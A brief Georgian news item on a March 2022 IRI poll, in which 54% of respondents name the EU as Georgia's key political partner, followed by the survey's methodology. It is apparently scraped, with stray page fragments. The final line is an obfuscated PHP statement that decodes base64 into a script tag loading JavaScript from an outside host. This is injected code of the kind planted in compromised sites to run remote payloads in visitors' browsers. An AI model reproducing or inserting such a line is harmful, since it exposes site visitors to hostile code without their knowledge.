celsiusi
ავერსი საქკაბელი
„საერთაშორისო რესპუბლიკური ინსტიტუტის (IRI) კვლევის თანახმად, გამოკითხულთა 54 პროცენტი საქართველოსთვის ყველაზე მნიშვნელოვან პოლიტიკურ პარტნიორად ევროკავშირს მიიჩნევს.
 
ამერიკის შეერთებულ შტატებს 53 პროცენტი ასახელებს, უკრაინას - 45%, თურქეთს-20 %, აზერბაიჯანს -20 %, სომხეთს -7 %, ჩინეთს - 4 %, რუსეთს 4 %, ირანი - 1 %.
 
კვლევა ჩატარდა 2022 წლის 4-24 მარტის პერიოდში "საერთაშორისო რესპუბლიკური ინსტიტუტის" კვლევების ცენტრის სახელით, ბალტიის კვლევებისა და გელაპის ორგანიზაციის წარმომადგენლის დოქტორი რასა ალიშაუსკინეს მიერ. კვლევის საველე სამუშაოები ჩატარდა IPM -ის მიერ. მონაცემები შეგროვდა პირისპირ ინტერვიუს გზით. შერჩევა მოიცავდა საარჩევნო ხმის უფლებისა და ასაკის მქონე 1486 რესპონდენტს. მონაცემები შეწონილ იქნა ასაკის, სქესის, რეგიონისა და დასახლების ზომის შესაბამისად. ცდომილების ზღვარი წარმოადგენს +/- 2.5 %, გამოპასუხების მაჩვენებელი - 64 %. კვლევის განხორციელება შესაძლებელი გახდა ამერიკელი ხალხის მხარდაჭერით, აშშ-ის საერთაშორისო განვითარების სააგენტოს მეშვეობით.
703
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");